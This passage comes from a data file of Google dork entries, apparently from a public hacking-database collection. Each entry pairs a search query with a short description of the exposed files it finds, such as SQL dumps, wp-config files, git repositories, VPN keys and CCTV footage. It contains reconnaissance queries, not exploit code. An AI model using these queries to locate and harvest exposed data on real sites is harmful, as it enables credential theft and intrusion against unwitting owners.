Title:\r\n\r\nCS-Cart admin panel settings information\r\n\r\n# Google Dork:\r\n\r\n\"/var/cache/registry/\"\r\n\r\n# Date: 11, Apr, 2019\r\n# Vendor Homepage:\r\nhttps://www.cs-cart.com/\r\n\r\n# Exploit Author: deadroot"}, {"dork": "intitle:\"index of\" scada", "description": "*Google Dork:- intitle:\"index of\" scada*\r\n\r\n*Description :- *\r\n\r\n*Discovers Scada juicy information.*\r\n\r\n*SCADA Sensitive Directories Expose on Site**.*\r\n\r\n*Date :- 20th April, 2019*\r\n\r\n*Exploit Author :- Aman Bhardwaj *"}, {"dork": "inurl:bc.googleusercontent.com intitle:index of", "description": "dork that enumerates GCP for sensitive directories\r\n\r\n*Google Dork*\r\n\r\ninurl:bc.googleusercontent.com intitle:index of\r\n\r\n*Dates: *21-05-2019\r\n\r\n*Dork Author:* acc3ssp0int"}, {"dork": "filetype:git -github.com inurl:\"/.git\"", "description": "Google dork description: web servers serving the git repository. This\r\npotential flaw can be used to download content from the Web server that\r\nmight otherwise be private.\r\n\r\nGoogle Search: filetype:git -github.com inurl:\"/.git\"\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "filetype:svn -gitlab -github inurl:\"/.svn\"", "description": "Google dork description: web servers serving the svn repository. This\r\npotential flaw can be used to download content from the Web server that\r\nmight otherwise be private.\r\n\r\nGoogle Search: filetype:svn -gitlab -github inurl:\"/.svn\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf"}, {"dork": "intitle:\"index of\" intext:\"Includes", "description": "*Exploit *: This Dorks allow you to access the sensitive directories\r\nusing includes file.\r\n\r\n*Google Dork* : intitle:\"index of\" intext:\"Includes\"\r\n\r\n*Exploit Author*:- Deepak Joshi"}, {"dork": "intitle:\"index of\" intext:\"Includes wordpress\"", "description": "Wordpress based website having sensitive directories.\r\n\r\nGoogle Dork: *intitle:\"index of\" intext:\"Includes wordpress\"*\r\n\r\nAuthor: Needa Petkar."}, {"dork": "\"To Parent Directory\" AND \"dir>\" AND \"web.config\"", "description": "Dork:\r\n\"To Parent Directory\" AND \"dir>\" AND \"web.config\"\r\n\r\nDescription:\r\nWeb Servers with Open Directory Listing containing web.config file"}, {"dork": "Inurl : /list/hdd1", "description": "# Google Dork: Inurl: /list/hdd1\r\n# Date: 2019-06-19\r\n# Author: l0n1s"}, {"dork": "Index of / *.ovpn", "description": "Files configuration openvpn, some certs, keys.\r\n\r\nIndex of / *.ovpn\r\n\r\nAuthor: nuria_pp"}, {"dork": "\"Index of\" inurl:config inurl:production", "description": "Dork: \"Index of\" inurl:config inurl:production\r\n\r\nDescription:\r\nOpen Directory listing with words \"config\" and \"production\" in the URL"}, {"dork": "intitle:\"Index of\" phpinfo.php", "description": "# Google Dork : intitle:\"Index of\" phpinfo.php\r\n# Author: Ayan Saha\r\n# Date: 23.07.2019\r\n# Tested on : Chrome,firefox."}, {"dork": "intitle:\"Index of\" public", "description": "# Exploit Title: Public Folder Directories\r\n\r\n# Google Dork: intitle:\"Index of\" public\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "intitle:\"Index of\" portal", "description": "Author = Scott FCS\r\n\r\nExploit Title = Public Portal Directory's"}, {"dork": "intitle:\"Index of\" wp-config", "description": "Dork:\r\nintitle:\"Index of\" wp-config\r\n\r\ninfo:contains wordpress senstive files\r\n\r\nAuthor:Mayur Parmar"}, {"dork": "intitle:\"Index of\" wp-content", "description": "Dork:\r\nintitle:\"Index of\" wp-content\r\n\r\nAuthor:Mayur Parmar\r\n\r\ninfo:\r\nit contains wordpress sensitive information."}, {"dork": "intitle:index.of.?.sql", "description": "I found a dork which lead to download .sql files from website. The dork is\r\n\r\n*DORK :\" ** intitle:index.of.?.sql **\" *"}, {"dork": "inurl: /filemanager/dialog.php", "description": "Dork : inurl: /filemanager/dialog.php\r\n\r\nImpact :Sensitive directories\r\n\r\nAuthor: Aditya shende\r\n\r\nDate : 1 august 2019"}, {"dork": "\"Index of\" inurl:webalizer", "description": "Google Dork: \"Index of\" inurl:webalizer\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "\"Index of\" inurl:phpmyadmin", "description": "Google Dork: inurl: \"Index of\" inurl:phpmyadmin\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "\"Index of\" inurl:htdocs inurl:xampp", "description": "Google Dork: \"Index of\" inurl:htdocs inurl:xampp\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "intitle:\"Index of\" inurl:wp-json/oembed", "description": "#Google Dork:\r\nintitle:\"Index of\" inurl:wp-json\r\nintitle:\"Index of\" inurl:wp-json/oembed\r\n\r\n#Description: contains sensitive files, links embedded with wordpress & can\r\nbe used to find CORS\r\n\r\n# Author: Tejas Jain ( https://www.linkedin.com/in/tejasjain52 )"}, {"dork": "intitle:\"Index of\" phpmyadmin", "description": "Dork:\r\nintitle:\"Index of\" phpmyadmin\r\n\r\nAuthor:mayur parmar(th3cyb3rc0p)\r\n\r\nInfo:\r\nContains sensitive information"}, {"dork": "intitle:\"Index of\" wp-admin", "description": "Dork: intitle:\"Index of\" wp-admin\r\nAuthor: Sathishshan\r\nInfo: Contains wordpress sensitive information & sensitive files"}, {"dork": "intitle:\"index of\" drupal", "description": "Dork: intitle:\"index of \" Drupal\r\nAuthor: Coudry hugo\r\nInfo : contains Drupal Sensitive files and information"}, {"dork": "intitle:\"index of\" admin", "description": "Dork: intitle\"index of\" admin\r\nAuthor : Coudry Hugo\r\nSensitive Directories"}, {"dork": "inurl:/sites/default/private", "description": "# Google Dork: inurl: inurl:/sites/default/private\r\n\r\n# Description: contains sensitive files & directories\r\n\r\n# Date: 07-08-2019\r\n\r\n# Author: Fr\u00e9d\u00e9ric Meunier"}, {"dork": "intitle:\"index of\" sql inurl:./db/", "description": "# Google Dork: intitle:\"index of\" sql inurl:./db/\r\n# Date: 09th AUGUST 2019\r\n# Author: BLAY ABU SAFIAN\r\n\r\nSENSITIVE DATABASE CREDENTIALS"}, {"dork": "intitle:index.of./.sql", "description": "I found a dork using which .SQL files can be downloaded from websites.\r\n\r\nHere is the dork :\r\nintitle:index.of./.sql\r\n\r\nSourajeet Majumder"}, {"dork": "intitle:\"Index of\" login.php", "description": "Dork: intitle:\"Index of\" login.php\r\nAuthor: Sathishshan\r\nInfo: Contains sensitive information & sensitive files"}, {"dork": "intitle:\"Index of\" wp-config.php", "description": "Dork: intitle:\"Index of\" wp-config.php\r\nAuthor: Sathishshan\r\nInfo: Contains sensitive information & sensitive files"}, {"dork": "intitle:index.of.?.bak", "description": "Google Dork: intitle:index.of.?.bak\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive .bak files which are backup files, in\r\nwebapplications.\r\n\r\nAuthor Name: Abhishek Sidharth"}, {"dork": "intitle:index.of./.db", "description": "dork to find the database information.\r\n\r\nDork : intitle:index.of./.db"}, {"dork": "intitle:\"index of\" /php4/", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" /php4/\r\nintitle:\"index of\" /php/ inurl:/php/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" mysqli.ini", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" mysqli.ini\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" ssh2.ini", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" ssh2.ini\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of.?.mysql", "description": "Google Dork: intitle:index.of.?.mysql\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive .mysql files"}, {"dork": "site:*/wp-includes/ inurl:/wp-includes/", "description": "Sensitive Directory:\r\n\r\nsite:*/wp-includes/ inurl:/wp-includes/\r\n\r\nReza Abasi"}, {"dork": "site:*/wp-contents/ inurl:/wp-contents/", "description": "Sensitive Directory:\r\n\r\nsite:*/wp-contents/ inurl:/wp-contents/\r\nsite:*/wp-contents/uploads/ inurl:/wp-contents/uploads/\r\n\r\nReza Abasi"}, {"dork": "intitle:\"index of\" /content/admin/", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" /content/admin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" /content/uploads/ -inurl:/wp-content/uploads/", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" /content/uploads/ -inurl:/wp-content/uploads/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of.?.database", "description": "Google Dork: intitle:index.of.?.database\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive database files (*.sql) from the website directory\r\n\r\nAuthor: Midhun Biju"}, {"dork": "index of /cache", "description": "Google Dork : index of /cache\r\n\r\nNisankh Acharjya"}, {"dork": "intitle:index.of.?.login", "description": "Descriptiton:\r\nUsed to find user authentication files from the website directory"}, {"dork": "site:*/wordpress/wordpress.bak/", "description": "sensitive directory:\r\n\r\nsite:*/wordpress/wordpress.bak/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" /config.ini", "description": "files containing password,sensitive info:\r\n\r\nintitle:\"index of\" /config.ini\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/wp/wp-admin/", "description": "sensitive directories:\r\n\r\ninurl:/wp/wp-admin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/ intitle:index.of", "description": "Google Dork: inurl:/admin/ intitle:index.of\r\n\r\nCategory: Sensitive Directories\r\nDescription: Index.of/ Sensitive Directories (i.e */admin/ )\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl:admin/data* intext:index of", "description": "Google Dork: inurl:admin/data* intext:index of\r\n\r\nCategory: Files Containing Juicy Info.\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl:/database* ext:sql intext:index of -site:github.com", "description": "Google Dork: inurl:/database* ext:sql intext:index of -site:github.com\r\n\r\nCategory: Files Containing Juicy Info.\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl: /upload.php intitle:index of", "description": "Google Dork: inurl: /upload.php intitle:index of\r\n\r\nCategory: Vulnerable Files.\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl:/scgi-bin*", "description": "Google Dork Submission for Apache servers, usually publicly facing directories, you might get lucky and find an outdated Cisco Router.\r\n\r\nAuthor: MiningOmerta"}, {"dork": "inurl:/wp-admin/includes/plugin-install.php", "description": "dork:\r\ninurl:/wp-admin/includes/plugin-install.php\r\n\r\nAuthor: Mayur Parmar(th3cyb3rc0p)"}, {"dork": "site:ftp.* index of /ftp/backup", "description": "To View *Backup* files on *FTP* server of various websites\r\n\r\n*Dork: site:ftp.* index of /ftp/backup*\r\n*Author: Paras Arora(PAC Security)*\r\n*Date: 9th September 2019*\r\n*Category: Backup files on FTP Server*"}, {"dork": "inurl:wp-content intext:backup-db", "description": "I have tested a dork in the Google Search and have found interesting\r\nresults.\r\n\r\nDork : *inurl:wp-content intext:backup-db*\r\n\r\n\r\n - This gives us the result of Various backup files/Folders stored in\r\n wp-content/uploads directories of various websites.\r\n - It also gives database backups consisting of SQL backup files of\r\n various websites who have not secured their sensitive directories.\r\n\r\nKaustubh Kale"}, {"dork": "inurl:/_vti_txt*", "description": "Google Dorks for Sensitive Directories"}, {"dork": "intitle:index.of./.htaccess", "description": "Dork Description : intitle:index.of./.htaccess\r\nCategory : Sensitive Directories."}, {"dork": "indexof:.htaccess", "description": "dork:\r\nindexof:.htaccess\r\n\r\nAuthor: Mayur parmar(th3cyb3rc0p)"}, {"dork": "indexof:backup/mysql", "description": "Dork:\r\nindexof:backup/mysql\r\nAuthor:\r\nSanyam Chawla"}, {"dork": "intitle:index.of \"admin.db\"", "description": "Google Dork: intitle:index.of \"admin.db\"\r\nDate: 09/17/2019\r\nExploit Author: th3d3xt3r"}, {"dork": "intitle:index.of \"admin\" filetype:sql", "description": "Google Dork: intitle:index.of \"admin\" filetype:sql\r\nDate: 09/17/2019\r\nExploit Author: th3d3xt3r"}, {"dork": "indexof:backup/web.config", "description": "Google Dork Description: indexof:backup/web.config\r\nAuthor Name: Vyshnav nk"}, {"dork": "site:* index of: *.exe", "description": "*DORK: *site:* index of: *.exe\r\n*AUTHOR*: Paras Arora(PAC Security)\r\n*DATE*: 12 October 2019\r\n*Category*: Juicy Files"}, {"dork": "intitle:\"Index of\" secret", "description": "# Exploit Title: Secret Folder\r\n\r\n# Google Dork: intitle:\"Index of\" secret\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "intitle:\"index of\" \"/etc/mysql/\"", "description": "Sensitive directories and files:\r\n\r\nintitle:\"index of\" \"/etc/mysql/\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/wp-content/uploads/ninja-forms/ intitle:\"index of\"", "description": "Google Dork Description: WordPress Ninja Forms Plugin, Sensitive file\r\nuploads.\r\n\r\nGoogle Search: inurl:/wp-content/uploads/ninja-forms/\r\n\r\nAuthor: derezzed"}, {"dork": "site:* index of: /config", "description": "*DORK: *site:* index of: /config\r\nAUTHOR: Paras Arora(PAC Security)\r\nDATE: 22nd October 2019\r\nCATEGORY: Juicy Files"}, {"dork": "site:*/logs/default.htm", "description": "Sensitive directories:\r\n\r\nsite:*/logs/default.htm\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Index of\" wp-upload", "description": "Dork:\r\nintitle:\"Index of\" wp-upload\r\nintitle:\"Index of\" wp-uploads\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nit contains wordpress sensitive information."}, {"dork": "intitle:index.of \"database.db\"", "description": "Sensitive Directories:\r\n\r\nintitle:index.of \"database.db\"\r\n\r\nAuthor: Ismail Tasdelen"}, {"dork": "intitle:index.of \"system.db\"", "description": "Sensitive Directories:\r\n\r\nintitle:index.of \"system.db\"\r\nintitle:index.of \"hash.db\"\r\nintitle:index.of \"sql.db\"\r\n\r\nAuthor: Ismail Tasdelen"}, {"dork": "site:* index.of: /android/manifest.xml", "description": "Dork: site:* index.of: /android/manifest.xml\r\nAuthor: Paras Arora(PAC Security)\r\nDate: 5th Nov 2019\r\nCategory: Android Files"}, {"dork": "intext:\"index of\" intext:..bak intext:config", "description": "Div backup files\r\n\r\nAuthor: Mattias Borg\r\n@mattiasborg82"}, {"dork": "intitle:index.of \"htaccess.txt\"", "description": "Dork:\r\nintitle:index.of \"htaccess.txt\"\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains htaccess.txt clear text sensitive information."}, {"dork": "intitle:\"index of\" \"ws_ftp.log\"", "description": "Sensitive directories:\r\n\r\nintitle:\"index of\" \"ws_ftp.log\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of \"chroot.conf\"", "description": "Dork:\r\nintitle:index.of \"chroot.conf\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\n\r\nInfo:\r\nIt contains sensitive information"}, {"dork": "intitle:index of \"uploads\"", "description": "# Google Dork : intitle:index of \"uploads\"\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 14-11-2019\r\n\r\n# Author : Rohitreddy"}, {"dork": "index of /storage/logs/", "description": "[*] Description: This dork will give you informational Logs of Laravel framework.\r\n\r\n[*] Google Dork: index of /storage/logs/\r\n\r\n[*] Author: Osman Arif"}, {"dork": "\"key\" OR key.jar intitle:\"index of\" webstart", "description": "*Java Web Start* (also known as *JavaWS*, *javaws* or *JAWS*) allows users\r\nto start application software for the Java Platform directly from the\r\nInternet using a web browser.\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" .zshrc~ OR .zshrc OR .zshenv OR .zshenv~ -pool -public", "description": "Z shell (Zsh) juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" .oracle_jre_usage/", "description": "This dork gives you the version of Java used by the target\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" squirrelmail/", "description": "Squirrel mail configuration files and sometimes credentials.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" vagrantfile -\"How to\"", "description": "The primary function of the Vagrantfile is to describe the type of machine\r\nrequired for a project, and how to configure and provision these machines.\r\nIt can contain DB passwords, private keys, usernames etc...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool", "description": "API keys\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" domain.key -public", "description": "Domains private Keys\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"ftp.log\"", "description": "Dork: intitle:\"index of\" \"ftp.log\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\nLinkedin: https://www.linkedin.com/in/pankaj1261/\r\nTwitter: @Nep_1337_1998\r\n\r\nInfo:\r\nIt contains FTP LOGS"}, {"dork": "intitle:\"index of\" \"sms.log\"", "description": "Dork: intitle:\"index of\" \"sms.log\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\nLinkedin: https://www.linkedin.com/in/pankaj1261/\r\nTwitter: @Nep_1337_1998\r\n\r\nInfo:\r\nIt contains SMS LOGS"}, {"dork": "-pool intitle:\"index of\" wget-log -pub", "description": "This dork will give you a good insight of what was downloaded in a system.\r\nGreat for enumeration.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/Cloudflare-CPanel-7.0.1\"", "description": "Dork: intitle:\"index of\" \"/Cloudflare-CPanel-7.0.1\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\nLinkedin: https://www.linkedin.com/in/pankaj1261/\r\nTwitter: @Nep_1337_1998\r\n\r\nInfo:\r\nIt expose Cloudflare-Cpanel sensitive files"}, {"dork": "intitle:index.of \"backwpup\"", "description": "Dork : intitle:index.of \"backwpup\"\r\n\r\nAuthor Gaurav Solanki (@heydarklord)"}, {"dork": "intitle:index.of \"db.zip\"", "description": "Find database backup files.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"*php.swp\"", "description": "Find swp files left over by vim and other text editors, to allow for php\r\nsource code disclosure."}, {"dork": "intitle:\"index of\" \"htdocs.zip\"", "description": "Find htdocs/website compressed backup.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "inurl:concrete/config/", "description": "Interesting directories from concrete5 cms exploiting directory listing.\r\n\r\ninurl:concrete/config/\r\n\r\nInteresting directories from concrete5 cms exploiting directory listing\r\nshoing config dir.\r\n\r\nBy\r\nSagar Banwa"}, {"dork": "inurl:\"/includes/api/\" intext:\"index of /\"", "description": "Dork to Find interesting folder related to API\r\n\r\ninurl:\"/includes/api/\" intext:\"index of /\"\r\n\r\nSagar Banwa"}, {"dork": "inurl:\"/includes/OAuth2\" intext:\"index of /\"", "description": "inurl:\"/includes/OAuth2\" intext:\"index of /\"\r\n\r\nSagar Banwa"}, {"dork": "intext:\"index of /\" \".composer-auth.json\"", "description": "intext:\"index of /\" \".composer-auth.json\"\r\n\r\nby\r\nPranshu Tiwari"}, {"dork": "intitle:\"index of\" \"config.py\"", "description": "The python configuration files can be found using the dork:\r\nintitle:\"index of\" \"config.py\"\r\n\r\n-Juveria Banu"}, {"dork": "intitle:\"index of\" \"metadata\"", "description": "# Google Dork: intitle:\"index of\" \"metadata\"\r\n\r\n# By using this dork, sensitive directories with juicy information can be\r\nfound.\r\n\r\n# Date: 14/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" inurl:wp-json embedurl?", "description": "Google Dork Query to find out sensitive information for misconfigured\r\nwordpress base servers.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" inurl:wp-json embedurl?*"}, {"dork": "intitle:\"index of\" \"apache-log-parser\" \"Port 80\"", "description": "Google Dork Query to find out insecure Apache Log Parsers giving access to\r\nServers Logs running on Port 80.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"apache-log-parser\" \"Port 80\"*"}, {"dork": "intitle:\"index of\" \"maven-metadata.xml\" \"Port 80\"", "description": "Google Dork Query to find out insecure maven meta data stored in XML format\r\nto identify the older versions which are also running on Port 80.\r\n\r\nGoogle Dork Query: i*ntitle:\"index of\" \"maven-metadata.xml\" \"Port 80\"*"}, {"dork": "intitle:\"index of\" \"jwt-auth\"", "description": "Google Dork Query to find out insecure and sensitve settings.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"jwt-auth\"*"}, {"dork": "intitle:\"index of\" \"/concrete/Authentication\"", "description": "Google Dork Query to find out insecure and sensitve concrete Authentication\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"/concrete/Authentication\"*"}, {"dork": "intitle:\"index of\" cvsroot", "description": "# Google Dork: intitle:\"index of\" cvsroot\r\n\r\n# By using this dork, cvsroot directories with juicy information and\r\nsometimes with exposed passwords can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"cctv\"", "description": "#Description: intitle:\"index of\" \"cctv\"\r\nThis Google dork shows CCTV video footages of other which are saved\r\ninsecurely on websites.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Ketan Amrute\r\n#Date: 4 April 2020"}, {"dork": "intitle:\"index of\" \"owncloud/config/*\"", "description": "This dork found owncloud config file. You can specify the search under the\r\n\"owncloud\" path.\r\n\r\nGoogle Dork : intitle:\"index of\" \"owncloud/config/*\"\r\n\r\nAuthor : Berat ISLER(root1x)"}, {"dork": "intitle:\"index of\" \"iredadmin/*\"", "description": "This dork found some useful information about the iredadmin mail\r\napplication.\r\n\r\nGoogle Dork : intitle:\"index of\" \"iredadmin/*\"\r\n\r\nAuthor : Berat ISLER (root1x)"}, {"dork": "intitle: \"index of\" \"MySQL-Router\"", "description": "#Description : intitle: \"index of\" \"MySQL-Router\"\r\nMySQL-Router is a middleware that routes database traffic to back end\r\ndatabase. This Google dork gives us sensitive information such as\r\ninformation of the users - location, username, ID etc.\r\n\r\n#Author: Kartik Adak\r\n#Date: 11 April 2020"}, {"dork": "intitle:\"index of\" \"common.crt\" OR \"ca.crt\"", "description": "# Google Dork: intitle:\"index of\" \"common.crt\" OR \"ca.crt\"\r\n\r\n# Configuration vpn files, certs, some keys, containing useful and juicy\r\ninformation.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"proxy.pac\" OR \"proxy.pac.bak\"", "description": "# Google Dork: intitle:\"index of\" \"proxy.pac\" OR \"proxy.pac.bak\"\r\n\r\n# Various proxy pac files containing juicy and sensitive information.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"global.asa\"", "description": "# Google Dork: intitle:\"index of\" \"global.asa\"\r\n\r\n# The global.asa configuration file is used by ASP.net applications to\r\nstore information and objects used by the application. Sometimes usernames,\r\npasswords, and database credentials can be revealed.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/db_backups/\"", "description": "#Description: intitle:\"index of\" \"/db_backups/\"\r\nThis Google dork shows juicy information about the website and finds out\r\ndatabase backup files with publicly available database directories.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 28 April 2020"}, {"dork": "intitle:\"index of\" db.frm", "description": "Dork: intitle:\"index of\" db.sql\r\nDescription: This Google dork shows juicy information about the website and\r\nfinds out publicly available *MariaDB databases* that contain sensitive\r\ninformation & can be exploited by the hacker.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"git-jira-log\"", "description": "Dork: intitle:\"index of\" \"git-jira-log\"\r\nDescription: This Google dork lists out sensitive git jira log files which\r\ncontain jira commits made via git for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/admin_backup\"", "description": "#Description: intitle:\"index of\" \"/admin_backup\"\r\nThis Google dork shows juicy information about the website and some\r\nsensitive directories.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 30 April 2020"}, {"dork": "intitle:\"index of\" \"admin/json\"", "description": "Dork: intitle:\"index of\" \"admin/json\"\r\nDescription: This Google dork lists out sensitive json file stored in the\r\nadmin folder for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/admin/backup\"", "description": "Path to admin backup file using\r\n\r\nintitle:\"index of\" \"/admin/backup\"\r\n\r\n-Juveria Banu"}, {"dork": "intitle:\"index of\" \"graphql/subscription\"", "description": "Dork: intitle:\"index of\" \"graphql/subscription\"\r\nDescription: This Google dork lists out sensitive graphQL subscription\r\nflows for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"symfony/config\"", "description": "Dork: intitle:\"index of\" \"symfony/config\"\r\nDescription: This google dork lists out symfony configuration details for a\r\nwebserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"test/storage/framework/sessions/\"", "description": "# Google Dork: intitle:\"index of\" \"test/storage/framework/sessions/\"\r\n\r\n# Juicy information and sensitive directories, including tokens and more.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"tinyfilemanager.php\"", "description": "Dork: intitle:\"index of\" \"tinyfilemanager.php\"\r\nDescription: This google dork lists out websites with the\r\n\"tinyfilemanager.php\" shell uploaded on them and informs the attacker that\r\na remote shell upload is possible.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"api/admin\"", "description": "Dork: intitle:\"index of\" \"api/admin\"\r\nDescription: This google dork lists out admin files for apis used on web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"index of\" \"/config/sql\"", "description": "# Title: Find sensitive SQL config files.\r\n# Google Dork: \"index of\" \"/config/sql\"\r\n# Date: 27/05/2020\r\n# Author: Ritik Sahni"}, {"dork": "intitle:\"index of\" \"admin/config\"", "description": "Dork:- intitle:\"index of\" \"admin/config\"\r\n\r\nDescription:-\r\nThis google dorks will find some Juicy Information about the admin-config\r\nfile.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "intitle:\"index of\" \"system/config\"", "description": "Dork:- intitle:\"index of\" \"system/config\"\r\n\r\nDescription:-\r\nThis google dorks will find some Juicy Information about the system-config\r\nfile.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "intitle:\"index of\" inurl:ftp intext:admin", "description": "Dork: intitle:\"index of\" inurl:ftp intext:admin\r\nDescription: This google dorks lists out admin folders on ftp servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx", "description": "# Google Dork: allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx\r\n# Sensitive stuff.\r\n# Date: 29/05/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"uploads.old\"", "description": "Dork: intitle:\"index of\" \"uploads.old\"\r\nDescription: This google dorks lists out sensitive files stored in old\r\nupload folders on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"Dashboard [Jenkins]\"", "description": "Google Dork: intitle:\"Dashboard [Jenkins]\"\r\n\r\nCategory: Sensitive Directories\r\n\r\nUsed to find Jenkins Dashboard\r\n\r\nAuthor Name: Vidhun k"}, {"dork": "\"index of\" \"fileadmin\"", "description": "Dork: \"index of\" \"fileadmin\"\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/\r\n\r\nHemant Patidar\r\n\r\nEthical Hacker | Founder and CEO at Solo Securities,\r\n\r\nCyber Security Analyst at Ismile Technologies\r\n\r\nPursuing B.Tech Civil Engineering from SRM University"}, {"dork": "\"index of\" \"svg\"", "description": "# Google Dork: \"index of\" \"svg\"\r\n# Title: Sensitive file disclosure\r\n# Date: 06/06/2020\r\n# Author: Mahesh Rai\r\n# LinkedIn: https://www.linkedin.com/in/mahesh-rai\r\n# Bugcrowd: https://bugcrowd.com/Mahesh_Rai"}, {"dork": "intitle:\"index of\" \"survey.cgi\"", "description": "Author: Mohammed Arif H\r\nDork: intitle:\"index of\" \"survey.cgi\""}, {"dork": "index of logs.tar", "description": "# Dork: index of logs.tar\r\n# Description: Juicy info"}, {"dork": "\"Index of\" \"sass-cache\"", "description": "Google Dork: \"Index of\" \"sass-cache\"\r\nCategory: Sensitive Directories\r\nAuthor: Prashant Sharma (@Prashantique)\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intitle:\"index of\" \"admin/sql/\"", "description": "Google Dork: intitle:\"index of\" \"admin/sql/\"\r\n\r\nImpact: Sensitive Directories\r\n\r\nAuthor: Rutwik Shah\r\nLinkedIn: https://www.linkedin.com/in/rutwikshah/"}, {"dork": "intext:\"INTERNAL USE ONLY\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx", "description": "# Google Dork: intext:\"INTERNAL USE ONLY\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx\r\n# Sensitive stuff.\r\n# Date: 2020-06-16\r\n# Exploit Author: Alexandros Pappas"}, {"dork": 